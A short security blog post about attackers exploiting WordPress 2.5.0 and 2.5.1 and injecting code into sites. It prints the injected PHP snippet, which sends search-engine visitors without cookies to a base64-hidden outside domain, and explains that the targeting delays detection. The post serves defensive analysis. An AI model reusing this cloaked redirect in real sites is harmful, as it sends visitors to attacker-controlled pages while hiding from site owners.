Wordpress 2.5.0 and 2.5.1 vulnerable to attack
Thanks to co-author Brandon Palmen for the heads up to a Wordpress hack in progress. The attackers are using a few obfuscation tricks to inject code into Wordpress installations using a recently announced vulnerability. More details in a well written write up here.
The code snippets from a digitalpoint.com forum are shown using base64 encoding to hide the true destination:
<php>
$seref=array("google","msn",
"live","altavista","ask",
"yahoo","aol","cnn",
"weather","alexa");
$ser=0;
foreach($seref as $ref)
if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false)
{ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0)
{
header("Location:http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/");
exit;
}
></php>
This code shows yet another trend we’ve noticed at stopbadware.org of only exploiting those requests which come directly from a search engine. We can only conclude this is to prevent (or delay) detection and maximize infection duration.
The Wordpress 2.5.0 and 2.5.1 vulnerable to attack by Zeroday 01100100011010010, unless otherwise expressly stated, is licensed under a Creative Commons Attribution-Share Alike 3.0 License.
Post a Comment
You must be logged in to post a comment.